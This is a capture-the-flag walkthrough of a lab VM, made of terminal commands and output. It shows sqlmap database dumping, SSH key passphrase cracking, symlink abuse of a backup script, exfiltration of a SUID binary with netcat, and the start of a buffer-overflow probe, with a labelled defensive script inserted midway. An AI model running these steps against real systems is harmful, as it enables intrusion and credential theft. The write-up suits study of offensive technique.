❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08    VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5    VMware, Inc.
192.168.60.191  08:00:27:54:56:08    PCS Systemtechnik GmbH
192.168.60.254  00:50:56:f2:e6:ff    VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.188 seconds (117.00 hosts/sec). 4 responded

❯ export ip=192.168.60.191
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
0day was here ♥

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.191:25565
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-22 08:41 CST
Initiating ARP Ping Scan at 08:41
Scanning 192.168.60.191 [1 port]
Completed ARP Ping Scan at 08:41, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:41
Completed Parallel DNS resolution of 1 host. at 08:41, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:41
Scanning 192.168.60.191 [1 port]
Discovered open port 25565/tcp on 192.168.60.191
Completed SYN Stealth Scan at 08:41, 0.09s elapsed (1 total ports)
Nmap scan report for 192.168.60.191
Host is up, received arp-response (0.00033s latency).
Scanned at 2025-05-22 08:41:06 CST for 0s

PORT      STATE SERVICE   REASON
25565/tcp open  minecraft syn-ack ttl 64
MAC Address: 08:00:27:54:56:08 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
2
[08:59:33] [INFO] retrieved: [08:59:38] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[09:00:37] [INFO] retrieved: coffee
available databases [2]:
[*] coffee
[*] information_schema

[09:00:54] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/Pepster/.local/share/sqlmap/output/results-05222025_0859am.csv'

[*] ending @ 09:00:54 /2025-05-22/
❯ sqlmap -u "http://192.168.60.191:25565/mine/login.php" --batch --forms -D coffee --tables
……………………
[09:01:29] [INFO] retrieved: [09:01:39] [INFO] adjusting time delay to 1 second due to good response times
users
Database: coffee
[1 table]
+-------+
| users |
+-------+

[09:01:53] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/Pepster/.local/share/sqlmap/output/results-05222025_0901am.csv'

[*] ending @ 09:01:53 /2025-05-22/
❯ sqlmap -u "http://192.168.60.191:25565/mine/login.php" --batch --forms -D coffee -T users --dump
[09:02:21] [INFO] retrieved: id
[09:02:27] [INFO] retrieved: username
[09:02:50] [INFO] retrieved: password
[09:03:18] [INFO] fetching entries for table 'users' in database 'coffee'
[09:03:18] [INFO] fetching number of entries for table 'users' in database 'coffee'
[09:03:18] [INFO] retrieved: 1
[09:03:19] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
2
[09:03:22] [INFO] retrieved: b0838efbde6accbc914c642981e4aef9
[09:05:15] [INFO] retrieved: user
[09:05:27] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [y/N/q] N
Database: coffee
Table: users
[1 entry]
+----+----------------------------------+----------+
| id | password                         | username |
+----+----------------------------------+----------+
| 2  | b0838efbde6accbc914c642981e4aef9 | user     |
+----+----------------------------------+----------+

[09:05:27] [INFO] table 'coffee.users' dumped to CSV file '/home/Pepster/.local/share/sqlmap/output/192.168.60.191/dump/coffee/users.csv'
[09:05:27] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/Pepster/.local/share/sqlmap/output/results-05222025_0902am.csv'
www-data@HiddenGate:/tmp$ vi id_rsa
www-data@HiddenGate:/tmp$ chmod 600 id_rsa
www-data@HiddenGate:/tmp$ ssh xiaoyuega@localhost -i id_rsa
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:IV6iZTL6D//1Ojh0d8XoSMepPgjyUfV/FpQmf3q35Hg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/var/www/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
Enter passphrase for key 'id_rsa':
echo "=== Starting Minecraft Server Backup ==="
echo "Source: $SOURCE_DIR"
echo "Destination: $BACKUP_DIR/$BACKUP_NAME"

# Check if source directory exists
echo "[1/4] Checking source directory..."
if [ ! -d "$SOURCE_DIR" ]; then
    echo "ERROR: Source directory $SOURCE_DIR does not exist!"
    exit 1
fi

# Create backup directory if it doesn't exist
echo "[2/4] Preparing backup directory..."
if [ ! -d "$BACKUP_DIR" ]; then
    echo "Backup directory doesn't exist, creating..."
    mkdir -p "$BACKUP_DIR"
    if [ $? -ne 0 ]; then
        echo "ERROR: Failed to create backup directory!"
        exit 1
    fi
fi

# Perform the backup using rsync
echo "[3/4] Copying world data (this may take a while)..."
# --copy-links dereferences every symlink in the source tree, so whatever a link
# points at is copied into the backup; chmod -R 755 then makes the copy world-readable.
rsync -a --copy-links --delete "$SOURCE_DIR/" "$BACKUP_DIR/$BACKUP_NAME"
chmod -R 755 "$BACKUP_DIR"
# Note: $? here is chmod's exit status, not rsync's, so a failed rsync is not detected.
if [ $? -ne 0 ]; then
    echo "ERROR: Backup failed!"
    exit 1
fi

# Verify backup
echo "[4/4] Verifying backup..."
if [ -d "$BACKUP_DIR/$BACKUP_NAME" ]; then
    echo "SUCCESS: Backup completed successfully!"
    echo "Backup location: $BACKUP_DIR/$BACKUP_NAME"
else
    echo "ERROR: Backup verification failed!"
    exit 1
fi
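As an added example (not the box's script and not part of the original post), a hardened counterpart of the backup logic above: it refuses a source tree containing symlinks that resolve outside it, never dereferences links, checks rsync's own exit status, and keeps the backup owner-only. Function names are hypothetical; GNU/busybox readlink -f and rsync are assumed.

```shell
#!/bin/sh
# Added example, not the backup script found on the box. That script dereferences
# symlinks (rsync --copy-links) and then runs chmod -R 755, so a link planted in the
# source tree pulls another user's private files into a world-readable backup.

# Print each symlink under $1 whose target resolves outside $1 (empty output = clean).
list_escaping_links() {
    [ -d "$1" ] || return 2
    root=$(readlink -f "$1") || return 2
    find "$root" -type l | while IFS= read -r link; do
        target=$(readlink -f "$link") || target=$link   # unresolvable: treat as in-tree
        case "$target" in
            "$root"|"$root"/*) ;;                       # resolves inside the tree
            *) printf '%s -> %s\n' "$link" "$target" ;;
        esac
    done
}

# Succeeds only when no symlink in $1 escapes the tree.
tree_is_safe() {
    [ -z "$(list_escaping_links "$1")" ]
}

# Hardened backup: SRC DST NAME. rsync's exit status is checked directly (the box's
# script tested $? only after chmod, so an rsync failure went unnoticed).
safe_backup() {
    tree_is_safe "$1" || { echo "refusing: symlinks escape $1" >&2; return 1; }
    umask 077                           # files created from here on are owner-only
    mkdir -p "$2" || return 1
    # -a copies symlinks as symlinks; --safe-links additionally drops any that
    # point outside the tree, so nothing is ever dereferenced into the backup.
    if ! rsync -a --safe-links --delete "$1/" "$2/$3"; then
        echo "ERROR: rsync failed" >&2
        return 1
    fi
    chmod -R u+rwX,go-rwx "$2"          # owner-only, never 755
}
```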
www-data@HiddenGate:/opt/minecraft_server$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/var/www/.ssh/id_rsa): /opt/minecraft_server/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /opt/minecraft_server/id_rsa
Your public key has been saved in /opt/minecraft_server/id_rsa.pub
The key fingerprint is:
SHA256:Jh0v6mePVs32jYdCAqSF6qNL2qDxDBEJRZg6XRg06Yg www-data@HiddenGate
The key's randomart image is:
+---[RSA 3072]----+
|.**+ .           |
|+.o.. . o        |
|=+ . . +.        |
|E.o . ...o       |
|.. . . S..o      |
| . o + .o =      |
|+ .. .. . + . +  |
|.X. . +. . + o   |
|o =. .+... . .   |
+----[SHA256]-----+
www-data@HiddenGate:/opt/minecraft_server$ cp id_rsa.pub authorized_keys
Oops, it was already backed up earlier, so the current folder now belongs to xiaoyuega and I can't create a new folder.
Stuck here.
Oh, it turns out that switching to a different wordlist cracks it.
Got the private key passphrase: fish
❯ john hash --wordlist=/usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
fish             (id_rsa)
1g 0:00:00:06 DONE (2025-05-26 20:08) 0.1642g/s 84.07p/s 84.07c/s 84.07C/s 315475..marvin
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Root privilege escalation
Since port 22 is only open locally, just connect from the www-data shell.
www-data@HiddenGate:/tmp/backup/backup_20250526_075124/123/.ssh$ ssh xiaoyuega@localhost -i id_rsa
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:IV6iZTL6D//1Ojh0d8XoSMepPgjyUfV/FpQmf3q35Hg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/var/www/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
Enter passphrase for key 'id_rsa':
Linux HiddenGate 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat May 10 13:51:19 2025 from 192.168.100.100
xiaoyuega@HiddenGate:~$ cat userrr.txt
flag{73aec4f42ce3001c2cb27eb52d65f15d}
The user's home directory contains cmd with the SUID bit set.
Transfer it to the local machine and analyze it.
xiaoyuega@HiddenGate:~$ ls -al
total 48
drwxr-x--- 3 xiaoyuega xiaoyuega  4096 May 11 03:38 .
drwxr-xr-x 3 root      root       4096 May 10 12:17 ..
lrwxrwxrwx 1 xiaoyuega xiaoyuega     9 May 10 12:49 .bash_history -> /dev/null
-rw-r--r-- 1 xiaoyuega xiaoyuega   220 May 10 12:17 .bash_logout
-rw-r--r-- 1 xiaoyuega xiaoyuega  3526 May 10 12:17 .bashrc
-rwsr-sr-x 1 root      root      17384 May 11 03:37 cmd
-rw-r--r-- 1 xiaoyuega xiaoyuega   807 May 10 12:17 .profile
drwx------ 2 xiaoyuega xiaoyuega  4096 May 10 13:40 .ssh
-rw------- 1 xiaoyuega xiaoyuega    39 May 11 01:21 userrr.txt
xiaoyuega@HiddenGate:~$ busybox nc 192.168.60.100 1234 < cmd
-----------------------
❯ nc -lvp 1234 > cmd
listening on [any] 1234 ...
192.168.60.191: inverse host lookup failed: Unknown host
connect to [192.168.60.100] from (UNKNOWN) [192.168.60.191] 37298
❯ gdb -q cmd
pwndbg: loaded 188 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from cmd...
(No debugging symbols found in cmd)
------- tip of the day (disable with set show-tips off) -------
Use the errno (or errno <number>) command to see the name of the last or provided (libc) error
pwndbg> cyclic 300
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa
pwndbg> r
Starting program: /home/Pepster/temp/cmd
warning: opening /proc/self/mem file failed: Permission denied (13)
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Please enter command: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaa